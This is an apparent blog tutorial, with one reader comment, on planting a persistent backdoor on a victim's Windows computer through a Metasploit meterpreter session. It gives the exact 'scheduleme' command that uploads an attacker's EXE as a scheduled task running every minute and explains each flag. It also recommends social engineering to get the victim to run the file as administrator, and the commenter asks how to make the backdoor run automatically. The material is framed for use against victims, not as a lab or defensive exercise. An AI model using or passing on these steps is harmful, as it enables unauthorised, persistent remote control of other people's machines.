For this we will be using the Scheduleme command but for this to work properly on windows vista and windows 7 the victim would have to open the exe as administrator. This is easy to ensure if you apply the correct social engineering.
The meterpreter session will run as the user id of the currect user. Then use the "use privs" command to get better privliages and more options then by typing "help" will list most of the avalible commands for you to use.
The "use privs" command might have been taken out in the new versions of metasploit instead i think it loads it automatically just try it out, and ill get back to you on this.
Using scheduleme command
running the below command will show you all the options avalible
>"run scheduleme -h"
The command i use is below
>"run scheduleme -m -1 -u -e /root/exploit.exe
Break down the command:
the -m options specifies how often the schedeld task will run so i did "-m -1" so every 1 mins it is started.
the -u starts the user name of the account with admin privs
the - e is the exe you want to upload to the victim which you want to use for you back door so mine is in root directory so -e /root/exploit.exe would be my option
Now its been uploaded exit meterpreter session and start the listener again and wait for a min for a connection ...watch video!
NOTE: The EXE which is uploaded must obviously configured to connect back to you and u create this exe just alike all the others.
1 comments:
nyc vid, but i got a question for you ..
what you did was you create a backdoor first and then set up the listener, send the backdoor to the victim then run it, and PWN :) ....anyways my question is this, do you have any script for executing the backdoor automatically because in your vid, you manually run the backdoor ..
hope you reply '
chopzz
Post a Comment
Any Questions...?